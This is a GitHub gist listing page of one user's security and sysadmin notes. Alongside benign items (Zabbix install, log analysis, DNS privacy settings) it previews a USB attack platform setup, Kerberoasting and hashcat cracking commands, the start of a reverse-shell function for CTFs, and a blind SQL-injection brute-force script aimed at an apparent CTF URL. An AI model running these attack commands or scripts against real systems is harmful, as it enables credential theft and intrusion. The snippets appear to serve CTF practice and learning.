AvasDream

@AvasDream
AvasDream / p4wnpi.md
Last active September 24, 2018 15:16
P4wnPi Setup

Project

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository

Installation

Copy the image to the SD card

dd if=<Source> of=<destination> bs=512 status=progress
@AvasDream
AvasDream / privesc.md
Last active October 8, 2018 13:35
Resources for privilege escalation.

Windows Kerberoasting

Only possible with valid credentials and Kerberos.

GetUserSPNs.py -request -dc-ip IP DOMAIN/USER

Retrieve the hash with Impacket.

hashcat -m 13100 --force -a 0 keberos_hash /usr/share/wordlists/rockyou.txt

@AvasDream
AvasDream / String-manipulation.md
Last active October 14, 2018 12:53
My personal cheatsheet for String manipulation in Linux

From upper to lowercase

cat string | tr '[:upper:]' '[:lower:]'

Cut spaces from string

tr -d ' '

@AvasDream
AvasDream / revshell.md
Last active May 29, 2019 15:08
Bash function to create a reverse shell from the tun0 interface. Might come in handy in CTFs or HackTheBox.
  • Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337

INF=tun0
PORT=1337
@AvasDream
AvasDream / zabbix.sh
Last active November 23, 2019 09:08
Easy install script for Zabbix 4.0 on Ubuntu 16.04 Server; also works with Ubuntu 18.04 but needs the 16.04 PPA in sources.list
#!/bin/bash
version=4.0.2
echo "execute with sudo privileges"
sudo true
echo "Install GCC"
sudo apt install gcc -y > /dev/null
echo "Install make"
sudo apt install make -y > /dev/null
echo "install postgresql server"
@AvasDream
AvasDream / snippets.md
Last active March 14, 2019 18:16
Python Hacking Snippets

Blind boolean-based UNION SQL injection brute-forcing

#!/usr/bin/python3
import requests
import timeit

start = timeit.default_timer()
URL = "http://35.227.24.107:5001/b3838cbb72/login"
QUERY = "admin' union select password from admins where id=1 and password like \""
@AvasDream
AvasDream / bbcheatsheet.md
Last active October 12, 2019 14:24
Bug Bounty Cheatsheet

Reconnaissance

DNS Recon

DNS Record Types:

A (Host address)
AAAA (IPv6 host address)
ALIAS (Auto resolved alias)
@AvasDream
AvasDream / log-analysis.md
Last active August 31, 2023 07:36
Monitor your SSH login attempts with Fail2ban and make a graph with Python and the Shodan API.

Analyse SSH Logins

We are looking at the auth.log file in /var/log/auth.log.

All the login attempts were captured in a time frame of ~3 hours.

Get all IPs from the log file.

sudo cat /var/log/auth.log | grep "Failed password" | awk -F 'from' '{print $2}' | cut -d" " -f2 > failed-login-ips.txt
@AvasDream
AvasDream / sss.md
Last active November 23, 2019 09:05
python scripts for
@AvasDream
AvasDream / win-privacy.md
Last active June 15, 2019 12:06
Windows 10 Privacy

DNS

Set Encrypted DNS Server

netsh interface ip add dns name="Ethernet" addr=1.1.1.1 index=1

netsh interface ip add dns name="Ethernet" addr=208.67.222.123 index=2